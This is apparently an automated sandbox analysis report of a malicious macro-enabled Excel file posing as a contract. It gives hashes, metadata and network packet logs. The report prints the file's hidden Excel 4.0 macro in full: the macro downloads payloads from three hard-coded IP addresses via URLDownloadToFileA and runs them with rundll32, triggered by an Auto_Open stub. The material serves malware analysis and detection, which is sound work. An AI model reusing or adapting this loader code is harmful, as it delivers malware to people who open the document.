                                                                                                                                                  C:\Users\user\Desktop\~$Contract_132508562.xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                  MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                  SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                  SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                  SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.963229655761012
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                  • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                  File name:Contract_132508562.xlsm
                                                                                                                                                  File size:178369
                                                                                                                                                  MD5:4acf095722b577ef282e9b2b736de65d
                                                                                                                                                  SHA1:fbb4e8aee2d48443cd9ee930fc79891edc88edaa
                                                                                                                                                  SHA256:8815a2be7dfd8565affb9271d229aab6289a97a96de5428c966fad85c6141e68
                                                                                                                                                  SHA512:72cc25cf42e1dd36a27164643ca978a16422c9e7cd03a16a78ad36cc4279959a68102c78cc76b5148f378e0413637187e86a886ed4cd9cd250403a39c19c40b8
                                                                                                                                                  SSDEEP:3072:qHYXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGUmh:qHgE5SDvbXAyHbVt15wTQDjmh
                                                                                                                                                  File Content Preview:PK..........!..D.C............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "/opt/package/joesandbox/database/analysis/382682/sample/Contract_132508562.xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:False
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                  Summary

                                                                                                                                                  Author:Rabota
                                                                                                                                                  Last Saved By:Noped
                                                                                                                                                  Create Time:2015-06-05T18:19:34Z
                                                                                                                                                  Last Saved Time:2021-04-05T10:24:08Z
                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                  Security:0

                                                                                                                                                  Document Summary

                                                                                                                                                  Thumbnail Scaling Desired:false
                                                                                                                                                  Company:
                                                                                                                                                  Contains Dirty Links:false
                                                                                                                                                  Shared Document:false
                                                                                                                                                  Changed Hyperlinks:false
                                                                                                                                                  Application Version:16.0300

                                                                                                                                                  Streams with VBA

                                                                                                                                                  VBA File Name: Module1.bas, Stream Size: 1415
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Module1
                                                                                                                                                  VBA File Name:Module1.bas
                                                                                                                                                  Stream Size:1415
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 02 f0 00 00 00 f2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 20 03 00 00 ec 04 00 00 00 00 00 00 01 00 00 00 d2 b3 f0 e3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  Application.ScreenUpdating
                                                                                                                                                  Application.Run
                                                                                                                                                  Attribute
                                                                                                                                                  Auto_Open()
                                                                                                                                                  VB_Name
                                                                                                                                                  Private
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Module1"
                                                                                                                                                  Private Sub Auto_Open()
                                                                                                                                                  Application.ScreenUpdating = True
                                                                                                                                                  Application.Run Sheets("Lops").Range("CD105")
                                                                                                                                                  End Sub

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 587
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECT
                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                  Stream Size:587
                                                                                                                                                  Entropy:5.30322377136
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 B 6 9 C 7 7 2 2 A 7 6 2 A 7 6 2 E 7 A 2 E
                                                                                                                                                  Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb
                                                                                                                                                  Stream Path: PROJECTwm, File Type: data, Stream Size: 89
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECTwm
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:89
                                                                                                                                                  Entropy:3.99189663324
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . . . 2 . . . 8 . A . B . 2 . . . . .
                                                                                                                                                  Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 cb e8 f1 f2 32 00 1b 04 38 04 41 04 42 04 32 00 00 00 00 00
                                                                                                                                                  Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3165
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:3165
                                                                                                                                                  Entropy:4.47387908896
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                  Stream Path: VBA/dir, File Type: data, Stream Size: 575
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/dir
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:575
                                                                                                                                                  Entropy:6.43198224607
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. ; . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . l . ^ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                  Data Raw:01 3b b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 6c a6 5e 62 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                                                  Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1014
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/\x1051\x1080\x1089\x10901
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1014
                                                                                                                                                  Entropy:3.25066068683
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . n } . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 01 f0 00 00 00 ea 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff f1 02 00 00 45 03 00 00 00 00 00 00 01 00 00 00 d2 b3 6e 7d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 1278
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/\x1051\x1080\x1089\x10902
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1278
                                                                                                                                                  Entropy:3.41554657424
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . b 7 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . ? . . J . . $ . . . ; . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . f < . @ . . h | . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 01 00 01 00 00 e2 03 00 00 e4 00 00 00 10 02 00 00 10 04 00 00 e9 03 00 00 4d 04 00 00 00 00 00 00 01 00 00 00 d2 b3 62 37 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 c8 5a f9 c4 3f e9 97 4a 88 a0 24 7f be c3 3b 18 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 1425
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1425
                                                                                                                                                  Entropy:3.30339911501
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . o u . . B . P 2 . @ . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . 3 . Z 4 A ? E . . . | . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 01 00 01 00 00 62 04 00 00 e4 00 00 00 10 02 00 00 90 04 00 00 69 04 00 00 d9 04 00 00 00 00 00 00 01 00 00 00 d2 b3 f3 e4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a3 48 f6 6f 75 d3 0a 42 90 50 32 bc 40 c7 bd 81 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  "=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Hi!D4)
                                                                                                                                                  ,,,,,,=NOW(),,,,,,,,,,,,,"=NOW()=NOW()=NOW()=FORMULA(""URLDownloadToFileA"",CE271)",,,,,,,,,,,,"=CONCATENATE(CC274,CD266,CC273)",,,,,,,,,,,,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)=NOW()=NOW()",JJCCJJ,,,,,,,,,,,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,,,,,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,,,,,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,,,,,,,,,,,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,,,,,,,,,,,"=""http://83.136.232.110/""",,,,,,,,,,,,,"=""http://185.212.131.194/""",,,,,,,,,,,,,"=""http://190.14.37.247/""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(Jo!E4),,,,,,,
                                                                                                                                                  "=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=HALT()

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  04/06/21-13:56:49.908477TCP1201ATTACK-RESPONSES 403 Forbidden8049169185.212.131.194192.168.2.22
                                                                                                                                                  04/06/21-13:56:52.144287ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  04/06/21-13:56:55.704260ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  04/06/21-13:57:02.134366ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  04/06/21-13:57:12.714807ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  04/06/21-13:57:17.134598ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  04/06/21-13:57:20.694827ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 6, 2021 14:03:52.125705957 CEST4972080192.168.2.483.136.232.110
                                                                                                                                                  Apr 6, 2021 14:03:55.130439997 CEST4972080192.168.2.483.136.232.110
                                                                                                                                                  Apr 6, 2021 14:04:01.318526030 CEST4972080192.168.2.483.136.232.110
                                                                                                                                                  Apr 6, 2021 14:04:13.378118992 CEST4973080192.168.2.4185.212.131.194
                                                                                                                                                  Apr 6, 2021 14:04:13.428390026 CEST8049730185.212.131.194192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:13.428530931 CEST4973080192.168.2.4185.212.131.194
                                                                                                                                                  Apr 6, 2021 14:04:13.429167032 CEST4973080192.168.2.4185.212.131.194
                                                                                                                                                  Apr 6, 2021 14:04:13.476890087 CEST8049730185.212.131.194192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:13.671674967 CEST8049730185.212.131.194192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:13.671777964 CEST4973080192.168.2.4185.212.131.194
                                                                                                                                                  Apr 6, 2021 14:04:13.677460909 CEST4973280192.168.2.4190.14.37.247
                                                                                                                                                  Apr 6, 2021 14:04:16.679138899 CEST4973280192.168.2.4190.14.37.247
                                                                                                                                                  Apr 6, 2021 14:04:22.695291996 CEST4973280192.168.2.4190.14.37.247
                                                                                                                                                  Apr 6, 2021 14:05:18.683244944 CEST8049730185.212.131.194192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:05:18.687314034 CEST4973080192.168.2.4185.212.131.194
                                                                                                                                                  Apr 6, 2021 14:05:38.266227007 CEST4973080192.168.2.4185.212.131.194
                                                                                                                                                  Apr 6, 2021 14:05:38.314112902 CEST8049730185.212.131.194192.168.2.4

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 6, 2021 14:03:36.312777996 CEST5170353192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:36.327481985 CEST6524853192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:36.358525038 CEST53517038.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:36.381795883 CEST53652488.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:36.655071974 CEST5372353192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:36.700829983 CEST53537238.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:38.918469906 CEST6464653192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:38.967345953 CEST53646468.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:39.466626883 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:39.523821115 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:48.300301075 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:48.357666016 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:48.712076902 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:48.780836105 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:49.739556074 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:49.795018911 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:50.758220911 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:50.817733049 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:52.771513939 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:52.850055933 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:03:56.787034988 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:03:56.835407972 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:06.426593065 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:06.472879887 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:07.739229918 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:07.794109106 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:08.922272921 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:08.973218918 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:10.113400936 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:10.161452055 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:10.420155048 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:10.466461897 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:10.894499063 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:10.942476034 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:11.661873102 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:11.710216045 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:12.546904087 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:12.593120098 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:13.456996918 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:13.503698111 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:14.349792957 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:14.398631096 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:15.229377985 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:15.291906118 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:16.854357958 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:16.900389910 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:26.457530022 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:26.530827045 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:27.004302979 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:27.095992088 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:27.376595974 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:27.439387083 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:27.583673954 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:27.643984079 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:28.049014091 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:28.103243113 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:28.705322981 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:28.761595964 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:29.291449070 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:29.346693039 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:29.768982887 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:29.827728987 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:31.347693920 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:31.393785000 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:31.773607969 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:31.819694042 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:32.374170065 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:32.429282904 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:32.898952007 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:32.944962025 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:42.421648979 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:42.467521906 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:45.001220942 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:45.047216892 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:45.256464958 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:45.328223944 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:04:50.998791933 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:04:51.056061983 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:05:15.432063103 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:05:15.480895996 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:05:19.174983978 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:05:19.220954895 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:05:20.774049044 CEST6242053192.168.2.48.8.8.8
